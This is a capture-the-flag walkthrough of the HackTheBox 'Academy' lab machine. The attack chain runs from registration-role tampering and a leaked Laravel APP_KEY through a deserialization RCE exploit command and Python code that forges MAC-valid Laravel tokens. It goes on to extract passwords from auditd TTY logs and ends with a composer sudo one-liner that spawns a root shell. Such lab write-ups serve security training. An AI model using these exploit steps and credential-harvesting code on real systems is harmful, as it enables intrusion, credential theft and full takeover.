# Academy

## <mark style="color:red;">Synopsis</mark>

Academy is an easy-difficulty Linux machine that features an Apache server hosting a PHP website. The website turns out to be the HTB Academy learning platform. Capturing the user registration request in Burp reveals that we can modify the Role ID, which gives us access to an admin portal. The portal discloses a vhost that is running on Laravel. Laravel's debug mode is enabled, and the exposed APP\_KEY together with a vulnerable version of Laravel allow us to carry out a deserialization attack that results in remote code execution. Examination of the Laravel .env file of another application on the box reveals a database password that also works for the cry0l1t3 user, who is a member of the adm group. That lets us read the system logs, and the TTY input audit logs reveal the password of the mrb3n user. mrb3n has been granted permission to execute composer as root using sudo, which we leverage to escalate our privileges to root.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FYbv5CSR8wb8llirsf6Io%2Fimage.png?alt=media&#x26;token=081e88bf-cfaf-4bac-84df-92ce2f33cb7f" alt=""><figcaption></figcaption></figure></div>

## <mark style="color:red;">Reconnaissance</mark>

### <mark style="color:blue;">nmap :</mark>&#x20;

As usual, we start by scanning for open ports and running services with nmap (default scripts, version detection, all output formats saved under `nmap/`):

```bash
nmap -sC -sV -oA nmap/academy 10.10.10.215
```

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FnW0gx3HYRcBeRunSbMuX%2Fimage.png?alt=media&#x26;token=c89fab94-9f75-4711-92f1-b331bbde3e38" alt=""><figcaption></figcaption></figure></div>

Add academy.htb to the `/etc/hosts` file (as root: `echo "10.10.10.215 academy.htb" >> /etc/hosts`) and then open the website in the browser.

## <mark style="color:red;">Enumeration</mark>&#x20;

### <mark style="color:blue;">Directory enumeration using dirsearch :</mark>&#x20;

```bash
# -x 403 hides forbidden responses so only reachable paths are listed
dirsearch -u http://academy.htb -x 403
```

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FWnGeIAs8QLomb2QUYGvL%2Fimage.png?alt=media&#x26;token=4d0c5dc5-8174-4c15-a26a-391563458fa3" alt=""><figcaption></figcaption></figure></div>

First, let's register an account.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2F3wRzquDaO0396T5Eh96K%2Fimage.png?alt=media&#x26;token=3dde9341-1092-4a76-8d10-29c478d9fc01" alt=""><figcaption></figcaption></figure></div>

A plain registration redirects us to the login page, and after logging in we land on the home page where modules can be purchased. There is also a separate login page at `/admin.php`, but it rejects the credentials of the account we just registered: the application enforces some role-based authorization, and our account does not have the admin role.

Register again, but this time intercept the request with Burp before submitting the username and password. The HTTP POST body contains a parameter called `roleid`, set by default to 0. The role is therefore decided by a value the client controls rather than server-side, which is the whole bug.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FnhtX63rLwVepF4VxP13N%2Fimage.png?alt=media&#x26;token=981f9431-1e10-4e9a-a183-f6c6358b2662" alt=""><figcaption></figcaption></figure></div>

Let's try another value to obtain a different role in the application: set `roleid` to 1 and forward the request.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FpT5JBeRLZumxeGGJMwqj%2Fimage.png?alt=media&#x26;token=d4e32714-6a2c-4031-9497-a767c8ea5533" alt=""><figcaption></figcaption></figure></div>

Now that we have registered an account with a different role ID, let's go to the login page at `/admin.php` and log in with the manipulated account.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FuTIiISl8ibrhA6qAanPm%2Fimage.png?alt=media&#x26;token=4026ecd2-6cd5-4137-9d45-61bcf4ba6c2d" alt=""><figcaption></figcaption></figure></div>

And boom, we are admin now.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FFgU3aZWyYn03HfEgqww8%2Fimage.png?alt=media&#x26;token=fb124a67-d33e-48c3-a025-c03fe75ecd8e" alt=""><figcaption></figcaption></figure></div>

The table on the admin page mentions a virtual host, `dev-staging-01.academy.htb`.

Let's add it to `/etc/hosts` as well, pointing at the same IP.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FEcHwt3lV86S9h32CeXWg%2Fimage.png?alt=media&#x26;token=bf2592e6-9117-4e59-bb5d-7d11c78b7401" alt=""><figcaption></figcaption></figure></div>

Visiting this virtual host in the browser shows a Laravel application with debug mode enabled: the error page dumps the environment variables, including the APP\_KEY, which is Laravel's application encryption key. Debug mode should never be on for a reachable deployment for exactly this reason: the whole `.env` (keys, database credentials) is one request away.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FWNJWLPEpIcTOKcNrzFjE%2Fimage.png?alt=media&#x26;token=f4ca1610-54f5-48bd-9822-3dbb086a5e2a" alt=""><figcaption></figcaption></figure></div>

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2F7kjL0uCAWgiroLH2kFp0%2Fimage.png?alt=media&#x26;token=dba5138a-23b0-475d-ae6c-fd3350a140bc" alt=""><figcaption></figcaption></figure></div>

## <mark style="color:red;">Gain an Initial Foothold</mark>

Searching for `laravel exploits` with **searchsploit** returns a few results. Looking each one up on Exploit-DB, the **token unserialize RCE** exploit (CVE-2018-15133) needs a valid APP\_KEY to work, which we now have thanks to the debug page, and it applies to the Laravel version running here.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2F4u58bZxv7n13BgMhW80Z%2Fimage.png?alt=media&#x26;token=ad552fd0-6f22-47de-adc0-2e43467cfcc8" alt=""><figcaption></figcaption></figure></div>

To exploit this vulnerability in Laravel we can use the following GitHub exploit:

{% embed url="<https://github.com/aljavier/exploit_laravel_cve-2018-15133>" %}

The installation guide is in the repository's README. The exploit takes two arguments:

* <mark style="color:green;">**URL :**</mark> <http://dev-staging-01.academy.htb>
* <mark style="color:green;">**APP\_KEY :**</mark> dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2F6ahMK0m7nuYFquY9xn4S%2Fimage.png?alt=media&#x26;token=48bc3b04-ef8c-498a-97d6-f3d316638a60" alt=""><figcaption></figcaption></figure></div>

```bash
# -i drops into an interactive pseudo-shell on the target
python3 pwn_laravel.py http://dev-staging-01.academy.htb dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= -i
```
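As an added check (this is not part of the original walkthrough nor of the exploit repository), the script below re-implements the authentication layer of Laravel's `Encrypter` in Python. The outer token is `base64(json({iv, value, mac}))`, and `mac` is HMAC-SHA256 over `base64(iv) || base64(ciphertext)` keyed with the raw bytes of APP\_KEY. That is why the leaked key is all the exploit needs: with it you can mint a token whose MAC verifies, so `decrypt()` AES-decrypts and, in the vulnerable 5.6.x versions, `unserialize()`s whatever you put in `value`. Before spending time on the exploit, `mac_is_valid()` lets you confirm the leaked key really is the live key by feeding it an encrypted cookie taken from the target (`laravel_session` or `XSRF-TOKEN`, URL-decoded first). The AES-256-CBC step of the real exploit is not reproduced here, and the ciphertext in the demo is random bytes, constructed for illustration.

```python
import base64
import hashlib
import hmac
import json
import os
from typing import Dict

# APP_KEY as written in a Laravel .env: a "base64:" prefix means the value is
# the base64 encoding of the 32 raw key bytes. This is the key leaked by the
# dev-staging-01 debug page.
LEAKED_APP_KEY = "base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0="


def key_bytes(app_key: str) -> bytes:
    """Turn the .env APP_KEY string into the raw key Laravel's Encrypter uses."""
    if app_key.startswith("base64:"):
        return base64.b64decode(app_key[len("base64:"):])
    return app_key.encode()


def laravel_mac(key: bytes, iv_b64: str, value_b64: str) -> str:
    """Encrypter::hash(): hex HMAC-SHA256 over base64(iv) . base64(ciphertext)."""
    return hmac.new(key, (iv_b64 + value_b64).encode(), hashlib.sha256).hexdigest()


def build_payload(key: bytes, iv: bytes, ciphertext: bytes) -> str:
    """Assemble the outer token the way Encrypter::encrypt() does:
    base64(json({"iv": b64(iv), "value": b64(ciphertext), "mac": hex})).
    Producing the AES-256-CBC ciphertext of the serialized object is the
    caller's job; this only authenticates whatever ciphertext it is given."""
    iv_b64 = base64.b64encode(iv).decode()
    value_b64 = base64.b64encode(ciphertext).decode()
    payload = {"iv": iv_b64, "value": value_b64, "mac": laravel_mac(key, iv_b64, value_b64)}
    return base64.b64encode(json.dumps(payload).encode()).decode()


def parse_payload(token: str) -> Dict[str, str]:
    """Split an encrypted cookie / X-XSRF-TOKEN value into its iv/value/mac parts."""
    data = json.loads(base64.b64decode(token))
    for field in ("iv", "value", "mac"):
        if field not in data:
            raise ValueError("not a Laravel payload: missing " + field)
    return data


def mac_is_valid(token: str, app_key: str) -> bool:
    """Encrypter::validMac() equivalent: True iff app_key produced this token's MAC.
    Any decoding failure (not base64, not JSON, wrong shape) counts as invalid."""
    try:
        parts = parse_payload(token)
        expected = laravel_mac(key_bytes(app_key), str(parts["iv"]), str(parts["value"]))
        return hmac.compare_digest(expected, str(parts["mac"]))
    except (ValueError, TypeError):
        return False


if __name__ == "__main__":
    # Demo on constructed data: random bytes stand in for the AES ciphertext.
    key = key_bytes(LEAKED_APP_KEY)
    token = build_payload(key, os.urandom(16), os.urandom(32))
    other_key = "base64:" + base64.b64encode(os.urandom(32)).decode()
    print("forged token validates under the leaked key:", mac_is_valid(token, LEAKED_APP_KEY))
    print("same token under an unrelated key          :", mac_is_valid(token, other_key))
```

Run it against a real cookie by pasting the URL-decoded cookie value into `mac_is_valid(cookie, LEAKED_APP_KEY)`: `True` means the staging key is live and the deserialization exploit is worth running; `False` means the key you hold is not the one the application uses, and no amount of payload tuning will help.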

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2F41yOghbbLiMv1QStiQSD%2Fimage.png?alt=media&#x26;token=ff9799c3-6c2d-433c-9e14-141e0212d4dc" alt=""><figcaption></figcaption></figure></div>

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2Ffc0GFUJUPckEDSs5aJqj%2Fimage.png?alt=media&#x26;token=8a2eb55b-dee5-41fe-a2b8-3289030f2409" alt=""><figcaption></figcaption></figure></div>

## <mark style="color:red;">Lateral Movement -> cry0l1t3</mark>&#x20;

Enumerating the box, we find the environment file of another Laravel application at `/var/www/html/academy/.env`. It contains a database password (`DB_PASSWORD`); credentials in `.env` files are a classic place to look for reuse.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FVyJIjnXIWmQsHaBJQIrt%2Fimage.png?alt=media&#x26;token=d3eaa84d-1c4d-42b4-bf3f-a31f7fefad6f" alt=""><figcaption></figcaption></figure></div>

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FUh4gN4SuwyYOxtR4X0Mp%2Fimage.png?alt=media&#x26;token=78d88cea-c7e2-4b1c-b250-ef91eb75d76c" alt=""><figcaption></figcaption></figure></div>

The `.env` does not name a system user, so the password was tried against every user in `/etc/passwd` that has a `/bin/bash` shell; it turned out to be cry0l1t3's password. Let's use it to log in as cry0l1t3.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2Fg41nY2iQaqPBSUs8RNVJ%2Fimage.png?alt=media&#x26;token=66c87dd7-6ac1-44df-b937-9d6aad2b394e" alt=""><figcaption></figcaption></figure></div>

## <mark style="color:red;">Lateral Movement -> mrb3n</mark>

Let's check which groups this user belongs to (`id`).

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FaTiNW8XxcLbwsJgYAAP4%2Fimage.png?alt=media&#x26;token=25667676-7ee3-4b49-bcbc-a6295f8e9145" alt=""><figcaption></figcaption></figure></div>

Let's find all files and directories owned by the group `adm`.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2F9yml3FQtAm7baoppDjlg%2Fimage.png?alt=media&#x26;token=ac25d6b3-c477-45b3-a6d3-eea09d3d22f2" alt=""><figcaption></figcaption></figure></div>

The adm group owns a lot of log files, so every member of this group is allowed to read the logs. Let's go through them and see if anything interesting appears.

After reading the logs manually I couldn't find anything of interest, so I turned to aureport, a tool that produces summary reports from the Linux audit log (auditd's `/var/log/audit/audit.log`).

{% embed url="<https://man7.org/linux/man-pages/man8/aureport.8.html>" %}

* <mark style="color:green;">**--tty :**</mark> report about TTY keystrokes, which may include plaintext passwords

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FRt2p5VPJFNImPkKK7xau%2Fimage.png?alt=media&#x26;token=e932ec39-c5fe-47e2-9930-c8c95aef2e16" alt=""><figcaption></figcaption></figure></div>
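The same information aureport pulls out of `/var/log/audit/audit.log` can be recovered with a short parser, which also makes the mechanism clear: `pam_tty_audit` writes one `type=TTY` record per chunk of keystrokes, with the raw input hex-encoded in the `data=` field, so anything typed into a password prompt (`su`, `sudo`, `ssh`, ...) lands in the log in clear when the module's `log_passwd` option is enabled. The Python below is an added example, not the page's own tooling; it runs on a constructed audit excerpt with a made-up password, and the rendering of control characters is my own notation rather than aureport's. It decodes the records, replays backspaces so you see what was actually submitted, and flags lines typed into programs that prompt for secrets.

```python
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed sample in the shape of auditd TTY records (pam_tty_audit); the
# keystrokes and the password are made up, not copied from the target.
SAMPLE_AUDIT_LOG = """\
type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=1002 ses=1 major=136 minor=1 comm="bash" data=6C730A
type=TTY msg=audit(1597199296.110:85): tty pid=2520 uid=1002 auid=1002 ses=1 major=136 minor=1 comm="bash" data=737520626F620A
type=TTY msg=audit(1597199301.442:86): tty pid=2601 uid=0 auid=1002 ses=1 major=136 minor=1 comm="su" data=5333637265742D703473787F730A
type=TTY msg=audit(1597199305.007:87): tty pid=2602 uid=1001 auid=1002 ses=1 major=136 minor=1 comm="bash" data=69640A04
"""

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
# Programs that read a secret from the terminal: their TTY records deserve a second look.
SECRET_PROMPT_COMMS = {"su", "sudo", "passwd", "ssh", "mysql", "gpg"}


def parse_tty_records(text: str) -> List[Dict[str, object]]:
    """Parse type=TTY lines into dicts; data= holds the raw keystrokes hex-encoded."""
    records = []
    for line in text.splitlines():
        if not line.startswith("type=TTY "):
            continue
        fields = {k: v.strip('"') for k, v in FIELD_RE.findall(line)}
        records.append({
            "ses": int(fields["ses"]), "pid": int(fields["pid"]),
            "uid": int(fields["uid"]), "auid": int(fields["auid"]),
            "comm": fields["comm"], "data": bytes.fromhex(fields["data"]),
        })
    return records


def render(data: bytes) -> str:
    """Make keystrokes readable with control characters shown explicitly
    (own notation, similar in spirit to what aureport --tty prints)."""
    names = {0x0A: "<nl>", 0x0D: "<ret>", 0x09: "<tab>", 0x1B: "<esc>", 0x7F: "<del>"}
    out = []
    for b in data:
        if b in names:
            out.append(names[b])
        elif b < 0x20:
            out.append("<^%c>" % (b + 0x40))
        elif b < 0x7F:
            out.append(chr(b))
        else:
            out.append("<%02X>" % b)
    return "".join(out)


def typed_lines(data: bytes) -> List[str]:
    """Replay line editing (backspace/DEL, ^U, Enter, ^D) to recover what the
    user actually submitted, one entry per submitted line."""
    lines, buf = [], []
    for b in data:
        if b in (0x0A, 0x0D):          # Enter: submit the line
            lines.append("".join(buf))
            buf = []
        elif b in (0x08, 0x7F):        # backspace / DEL: drop the last character
            if buf:
                buf.pop()
        elif b == 0x15:                # ^U: kill the whole line
            buf = []
        elif b == 0x04:                # ^D: end of input, submit if non-empty
            if buf:
                lines.append("".join(buf))
                buf = []
        elif 0x20 <= b < 0x7F:         # printable ASCII
            buf.append(chr(b))
        # other control bytes (arrow keys, etc.) are ignored here
    if buf:
        lines.append("".join(buf))
    return lines


def secret_candidates(records) -> List[Tuple[int, int, str, str]]:
    """Lines typed into programs that prompt for a secret: (ses, pid, comm, line)."""
    found = []
    for r in records:
        if r["comm"] in SECRET_PROMPT_COMMS:
            for line in typed_lines(r["data"]):
                found.append((r["ses"], r["pid"], r["comm"], line))
    return found


def session_transcript(records) -> Dict[int, List[str]]:
    """Keystrokes per login session in log order, prefixed by the reading program."""
    per_session = defaultdict(list)
    for r in records:
        per_session[r["ses"]].append("%s: %s" % (r["comm"], render(r["data"])))
    return dict(per_session)


if __name__ == "__main__":
    recs = parse_tty_records(SAMPLE_AUDIT_LOG)
    for ses, entries in session_transcript(recs).items():
        print("session", ses)
        for entry in entries:
            print("  ", entry)
    for ses, pid, comm, line in secret_candidates(recs):
        print("candidate secret typed into %s (pid %d): %r" % (comm, pid, line))
```

On a real host, point `parse_tty_records` at the contents of `/var/log/audit/audit.log` (readable by root and, as here, by the adm group). The `comm` of a record tells you which program consumed the keystrokes, which is what turns a stream of bytes into "this was typed at the `su` password prompt"; the defensive takeaway is that `pam_tty_audit` with `log_passwd` turns the audit log itself into a credential store, so its readers must be as trusted as the passwords it captures.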

The keystrokes captured from the `su` prompt give us mrb3n's password. Now let's SSH in as mrb3n with it.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2F2mQhMjcOmqgZbHUxsFgs%2Fimage.png?alt=media&#x26;token=1e618f30-a2b0-4522-bc81-9a3ca307def1" alt=""><figcaption></figcaption></figure></div>

## <mark style="color:red;">Privilege Escalation</mark>

Performing manual enumeration on the box (`sudo -l`), we find that the user mrb3n can run the composer command as root using sudo.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FWjbCZ7zk3yHCJCMfQtDw%2Fimage.png?alt=media&#x26;token=fdf58109-538e-44dc-b6e5-c1ff716128db" alt=""><figcaption></figcaption></figure></div>

According to GTFOBins, composer can be abused for privilege escalation: the `scripts` section of a `composer.json` is a list of arbitrary shell commands, and `run-script` executes them with the privileges of the composer process, which here is root.

{% embed url="<https://gtfobins.github.io/gtfobins/composer/>" %}

<figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2F38krvoj6FcHsm5AUX5C3%2Fimage.png?alt=media&#x26;token=f2b2fe40-5160-492e-a813-48fbfddfda90" alt=""><figcaption></figcaption></figure>

```bash
# composer.json "scripts" are arbitrary shell commands, run as root via sudo
TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script x
```

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2F3UAidykrvXJZyP7FuPWq%2Fimage.png?alt=media&#x26;token=89f947b4-7aad-4818-890f-086b97f1f196" alt=""><figcaption></figcaption></figure></div>

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FxBJMEb0nIIWsbHyYFxTm%2Fimage.png?alt=media&#x26;token=671d3fb2-272d-450a-95e3-ed0951f070bc" alt=""><figcaption></figcaption></figure></div>

I hope you found this walkthrough easy to understand and follow.

Greetings from [<mark style="color:red;">Sayonara</mark>](https://github.com/ismail-arame)

